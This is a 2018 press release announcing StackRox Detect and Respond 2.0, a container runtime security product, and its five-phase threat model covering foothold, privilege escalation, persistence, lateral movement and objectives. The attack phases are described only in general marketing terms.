StackRox Delivers Adversarial Intent Model (AIM)

February 2, 2018

StackRox Detect and Respond 2.0 delivers robust threat detection capabilities across five phases of container attacks defined by the new StackRox AIM. With expanded depth and breadth of threat detection, auto-tuned machine learning, and application auto-grouping, StackRox Detection and Response 2.0 enables customers to get ahead of threats aimed at their Docker containers running in production with greater ease and efficiency.

“Container usage for production deployments in enterprises is still constrained by concerns around security, monitoring, data management, networking and orchestration,” wrote Arun Chandrasekaran and Dennis Smith, Gartner research VPs in Best Practices for Running Containers in Production.* StackRox Detect and Respond deploys using a customer’s existing tools and orchestrator, running alongside containerized applications to continuously monitor and protect containers from threats.

StackRox’s research and development with Docker, Google, and large enterprises in the area of container runtime security has culminated in StackRox AIM, a five-phase threat model that underlies our unique detection strategy to surfacing attacks. By examining application deployments through an attacker’s lens, StackRox exposes threats by fusing together signals in container environments which correspond to the five iterative phases of an attack’s lifecycle. The new detection capabilities within each of these categories include:

  • Foothold. Reverse shell invocation enabled by generic initial exploitation vectors (i.e. web/network-based exploits); java-based code injection attacks.
  • Privilege Escalation. Execution of setuid/setgid by non-root users.
  • Persistence. Database persistence via post of database procedures; user persistence via modification of PAM configurations.
  • Lateral Movement. Anomalous network communication with a client followed by payload execution or unexpected process cloning.
  • Objectives. Cryptocurrency mining software; exfiltration of sensitive content via reading stored secrets or accessing confidential file paths.

“We’ve worked closely with our enterprise customers to help protect them against the new landscape of threats in container environments. Together we  developed StackRox AIM as a new methodology to protect them from threats,” said Sameer Bhalotra, co-founder and CEO for StackRox. “With the new capabilities in StackRox Detect and Respond 2.0, enterprises running containers in production can get ahead of attackers and limit the blast radius of attacks.”

StackRox Detect and Respond 2.0 now includes:

  • Expanded threat detection. New capabilities as described above to increase the depth and breadth of threat detection based on StackRox AIM.
  • Autotuned machine learning. StackRox now automates learning from security events, establishing baselines so it can provide alerts for anomalous activities as potential Indicators of Compromise (IOCs).
  • Extended integration with container orchestrators. StackRox leverages user-defined data from the orchestrator to automatically group services within applications, eliminating manual work for users, and providing immediate visibility into applications.

StackRox Detect and Respond 2.0 is scheduled for general availability in Q1.

Terms of Use | Copyright © 2002 - 2018 CONSTITUENTWORKS SM  CORPORATION. All rights reserved. | Privacy Statement